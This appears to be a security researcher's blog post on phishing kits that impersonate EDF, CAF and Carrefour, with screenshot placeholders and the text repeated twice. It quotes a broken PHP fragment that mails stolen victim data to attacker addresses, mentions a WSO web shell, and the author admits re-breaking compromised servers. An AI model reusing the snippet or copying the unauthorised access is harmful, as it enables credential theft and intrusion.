These days they do EDF+CAF and back with Carrefour.
EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33
bigcave.php:
Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024
Mechanism is interesting on this one
![]()
It extract a zip file inside a a freslhy created dir and write EDF customer IP on Vcounter.txt
![]()
Seem the bad guys tested it to see if everything work :)
![]()
It's always these 41.x IP from Morocco.
(CF: Access logs of http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)
The bad guys leaved Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:
![]()
'Nice'
![]()
Spamtool:
![]()
And some others craps...
For CAF and Carrefour they have not used Hijacked servers (just for redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804
The CAF mail is just a big failure:
![]()
Bank customers reply to phishing e-mail:
![]()
---
![]()
---
![]()
---
![]()
---
![]()
---
![]()
---
![]()
---
![]()
---
![]()
A new tool appeared, phishers will be probably interested.
![]()
Also i got an interesting mail:
![]()
That become a problem when hackers use hijacked servers (especially for phishing and malware hosting)
I concider myself as borderline, i re-break theses servers with my real IP to get the malicious stuff.
I leave files untouched, including hackers files, sometime i probably make more shit than them on log files, i don't edit thems to hide my IP.
I never got sued for hacking a compromised machine and i hope that will not happen.
EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33
bigcave.php:
$send="Ayoub.boos7@hotmai1.fr";
$subject="EDF : $ip";
$from="From: Tool4Spam.Com" ;
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
$subject="EDF : $ip";
$from="From: Tool4Spam.Com
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024
Mechanism is interesting on this one
It extract a zip file inside a a freslhy created dir and write EDF customer IP on Vcounter.txt
Seem the bad guys tested it to see if everything work :)
(CF: Access logs of http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)
The bad guys leaved Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:
'Nice'
Spamtool:
And some others craps...
For CAF and Carrefour they have not used Hijacked servers (just for redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804
The CAF mail is just a big failure:
Bank customers reply to phishing e-mail:
A new tool appeared, phishers will be probably interested.
Also i got an interesting mail:
I concider myself as borderline, i re-break theses servers with my real IP to get the malicious stuff.
I leave files untouched, including hackers files, sometime i probably make more shit than them on log files, i don't edit thems to hide my IP.
I never got sued for hacking a compromised machine and i hope that will not happen.